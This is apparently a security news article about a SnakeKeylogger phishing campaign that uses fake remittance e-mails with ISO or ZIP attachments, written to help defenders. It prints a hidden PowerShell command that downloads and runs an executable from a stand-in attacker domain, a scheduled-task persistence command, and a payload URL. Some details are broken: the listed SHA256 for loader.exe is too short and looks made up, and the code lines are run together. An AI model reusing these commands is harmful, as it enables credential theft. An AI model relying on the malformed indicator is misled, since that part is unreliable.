A newly observed information‐stealing campaign is deploying a stealthy variant of the SnakeKeylogger malware via weaponized e-mails that masquerade as legitimate remittance advice from CPA Global and Clarivate.
Researchers first identified the infection vector on October 7, 2025, when recipients received messages titled “remittance advice for the payment dated 07‐Oct‐2025,” urging them to download an attached ISO or ZIP file containing a malicious BAT script.
Analysis reveals that the malware leverages embedded PowerShell commands to fetch the SnakeKeylogger payload, execute it, and exfiltrate harvested credentials to attacker‐controlled infrastructure.
The campaign’s social engineering revolves around spoofed sender aliases such as “CPA‐Payment Files” and display names referencing CPA Global or Clarivate, lending false legitimacy to the phishing lure.
The e-mails contain brief text asking recipients to review the attached payment advice, accompanied by an image mimicking a corporate letterhead.
The malicious attachment is delivered as either an ISO image or a compressed ZIP archive, both of which contain a single BAT script. When executed, this script silently invokes a sequence of PowerShell commands that download and run the SnakeKeylogger implant from a remote server.
The use of ISO containers helps the campaign bypass simple ZIP‐only scanning policies, while the dual‐stage architecture complicates detection.
PowerShell-Based Deployment
Upon user interaction with the attachment, the BAT script executes a PowerShell one-liner similar to the following:
powershell@echo off
powershell -NoProfile -WindowStyle Hidden -Command "$u='http://malicious[.]domain/loader.exe';$p='$env:TEMPupdate.exe';Invoke-WebRequest -Uri $u -OutFile $p;Start-Process $p"
This command instructs PowerShell to download the SnakeKeylogger executable (loader.exe) to a temporary directory and launch it.
The hidden window style ensures minimal visual indicators. Once executed, SnakeKeylogger hooks into browser processes and keylogging APIs to capture credentials and session tokens.
The malware packs its core functionality into a lightweight executable under 800 KB, enabling rapid download and execution.
Researchers observed that the payload uses Windows API calls to inject into legitimate processes such as explorer.exe or svchost.exe, further evading endpoint protection solutions.
Data Exfiltration and Persistence Mechanisms
After harvesting keystrokes and clipboard data, SnakeKeylogger compresses the logs and exfiltrates them over HTTP POST requests to a command‐and‐control endpoint hosted on a compromised web server.
The exfiltration traffic appears legitimate due to the use of standard HTTP user-agents and encryption via base64 encoding. The malware achieves persistence by creating a scheduled task named “SysUpdate” that triggers every hour:
powershellschtasks /Create /TN "SysUpdate" /TR "%TEMP%update.exe" /SC HOURLY /F
This ensures that even if the process is terminated, it will relaunch automatically. Analysts also discovered that the threat actor registered multiple subdomains for fallback connectivity, enabling high availability of the C2 infrastructure.
The SnakeKeylogger campaign demonstrates how simple social engineering, combined with built-in Windows tools like PowerShell, can facilitate stealthy credential theft at scale.
Organizations should reinforce user awareness on scrutinizing payment‐related e-mails, implement robust attachment‐sandboxing policies, and employ behavior-based detection to catch malicious process injection and data exfiltration activities.
Enhanced logging of scheduled tasks and network egress points will be critical to identifying and disrupting this threat before sensitive data is compromised.
Indicators of Compromise
Security teams should monitor for the following IoCs to detect and mitigate this campaign:
| Indicator Type | Value |
|---|---|
| Malicious domain | malicious.domain |
| SHA256 (loader.exe) | 9f3c2a5b4d6e8f12c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8 |
| Scheduled task name | SysUpdate |
| PowerShell one-liner flag | -NoProfile -WindowStyle Hidden -Command |
| Phishing sender alias | CPA-Payment Files |
Security teams are advised to block the identified domains, hash values, and scheduled tasks at the perimeter and endpoint layers.
| SHA256 Hash | File Type | Description | Additional Details |
|---|---|---|---|
| 1bf2e282e0b58814838af57c8792b6147eacedb3f954821b8eea3b79e1f77cb3 | ZIP (mail attachment) | Malicious archive file | Delivered as an email attachment |
| fb17cc142e92edd5c683c3d53ff8e15f73c67b65df116827f92c9f81c672ec26 | ISO (mail attachment) | Malicious disk image | Delivered as an email attachment |
| 929fc6575e8ca6b7a657c784254693c4a343e0576bc64a8ba42eac5003796e68 | BAT (downloader) | Batch script downloader | Downloads a PowerShell script from URL below |
| N/A | PS script URL | PowerShell script downloaded by BAT | hxxp://fxa[.]sabitaxt[.]com/mc55tP.ps1 |
Email filtering solutions should enforce stricter ISO file inspection and flag any e-mails containing PowerShell commands within attachments. Endpoint protection platforms must be tuned to detect anomalous process injection and unsanctioned scheduled tasks.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
